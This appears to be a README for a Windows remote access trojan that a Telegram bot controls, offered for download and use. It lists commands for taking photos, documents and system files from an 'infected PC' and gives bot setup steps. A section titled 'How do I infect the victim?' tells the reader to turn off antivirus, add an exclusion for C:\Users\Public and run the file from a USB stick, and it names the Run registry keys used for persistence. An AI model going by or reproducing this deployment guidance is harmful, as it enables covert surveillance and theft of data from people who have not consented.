█▀▀█  █▀▀█ ▀▀█▀▀ 　 
█▄▄▀  █▄▄█   █   　 
█  █  █  █   █   　 

▀▀█▀▀ █▀▀ █   █▀▀ █▀▀▀ █▀▀█ █▀▀█ █▀▄▀█  █▀▀▀█ █▀▀█ █  █  █▀▀█ █▀▀█ ▀▀█▀▀ 
  █   █▀▀ █   █▀▀ █ ▀█ █▄▄▀ █▄▄█ █ ▀ █  ▀▀▀▄▄ █  █ █▄▄█  █▀▀▄ █  █   █ 
  █   ▀▀▀ ▀▀▀ ▀▀▀ ▀▀▀▀ ▀ ▀▀ ▀  ▀ ▀   ▀  █▄▄▄█ █▀▀▀ ▄▄▄█  █▄▄█ ▀▀▀▀   ▀

• Developed by: SebastianEPH
• Product name: RAT Telegram Spy Bot
• Type software: Remote Administration Tool
• File version: 1.0
• Architecture: x86 bits || x64 bits
• State: No verificado [Posible Fallos]
• Size: 400KB aprox
• Undetectable: Not Tester << No Verificado
• Plataform: Windows 7, 8.1, 10
• Programming language: C#.net Framework - Console
• Licence: MIT
• IDE or text editor: Visual Studio Comunity 2019
• Documentation date: 20/05/2020
• Description: Remote access Trojan, spies and obtains information from the infected pc, controlled by telegram commands.

Show a message only if the infected PC is online

Shows detailed information of the infected PC

It shows default system folders where there can be: [Images] [Photos] [Documents] [Music] and gets them, the process can take many minutes

In case you can't find the folder, show a message a controlled exception

• Write the command plus the file path with extension.
• The accepted file extensions are as follows, the file must not exceed 50MB

  string[] video = { "gif", "mp4", "avi", "div", "m4v", "mov", "mpg", "mpeg", "qt", "wmv", "webm", "flv", "3gp" };
  string[] audio = { "midi", "mp1", "mp2", "mp3", "wma", "ogg", "au", "m4a" };
  string[] doc = { "doc", "docx", "txt", "log", "ppt", "pptx", "pdf" };
  string[] imagen = { "jpg", "jpeg", "png", "bmp", "ico", "jpe", "jpe" };
  string[] system = { "ani", "bat", "bfc", "bkf", "blg", "cat", "cer", "cfg", "chm", "chk", "clp", "cmd", "cnf", "com", "cpl", "crl", "crt", "cur", "dat", "db", "der", "dll", "drv", "ds", "dsn" , "dun","exe","fnd","fng","fon","grp","hlp","ht","inf","ini","ins","isp","job","key","lnk","msi","msp","msstyles", "nfo","ocx","otf","p7c","pfm","pif","pko","pma","pmc","pml","pmr","pmw","pnf","psw","qds","rdp","reg","scf","scr","sct","shb","shs","sys","theme", "tmp","ttc","ttf","udl","vxd","wab","wmdb","wme","wsc","wsf","wsh","zap"};

NOTE: Do not enclose path in double or single quotes

Only list subfolders of a drive

Example: /Dir C:\User\Photos and videos

NOTE: Do not enclose path in double or single quotes

It will show all files folders and subfolders within the specified path, plus each file found is detailed.

As the previous command only lists specific folders but does not list a complete drive, this command fulfills that function. It would only be enough to select the drive, and if the drive exists it will list all the directories, otherwise it will display a message that the drive does not exist, it becomes a complete of /Dir

Developing... [No habilitado]

Show creator info.

1. We head to the following address >BotFather<

   

2. Create our new bot.

   

3. We look for our Bot, and we start it.

   

4. Now we get our Chat ID, this is done so that only the keylog reaches us and not anyone who finds the bot.

5. We look for the Bot called Chat ID and we get our Chat ID

   

6. At the end we will have our Bot Token and our Chat ID

1. In Visual Studioopen the project and go to the archive config.cs

   

2. Within this file we will replace the Chat ID and the Bot Token

   

3. We compiled and observed that in our telegram bot, we received a message from ==>> Computer: sebas is online <<==

   NOTE: In this case it shows a console, just because I have Debug mode enabled, you should not get that console.

The compiled files are found within the project, in the following path

Path : [GitHub] RAT_BotTelegram\RAT TelegramSpyBot\bin\Debug

The main file is RAT TelegramSpyBot

NOTE: When you run the main file, it will replicate to the system and modify the system boot record, but all the files in the image are important, the RAT will not work if it is not with its plugins

How do I infect the victim?

Note: Do not rename the file RAT TelegramSpyBot.exe, sIf you change the name, the RAT will be obsolete.

• You save the files on a USB.
• It will connect the USB to the __ [PC] __ to infect.
• It is recommended to disable the antivirus or add an exclusion in the following path: "C:\Users\Public".
• Next is to run the RAT TelegramSpyBot.exe file on the USB, the RAT will be replicated in the following path: "C:\Users\Public\RAT_Telegram", It is recommended not to remove the USB instantly as the RAT Telegram will be replicating on the specified path.

Note: When executing the file, it will automatically modify the windows registry so that it always starts when you turn on the computer.

The RAT will modify the following registry path"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" therefore you will need administrator permissions, therefore it is recommended that the first execution be carried out with administrator permissions, in case you do not execute it with administrator permissions, the RAT will modify the following path"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"

Explanation:

• HKEY_LOCAL_MACHINE: the RAT will run on all existing users and new computer users.
• HKEY_CURRENT_USER: the RAT will only run on the current user, if another user will be created, the RAT will only work on the main user

Note: Contact me only if you found a bug or want to contribute to the repository, thanks.

Developed: by SebastianEPH

• Website
• Github
• Linkedin
• Telegram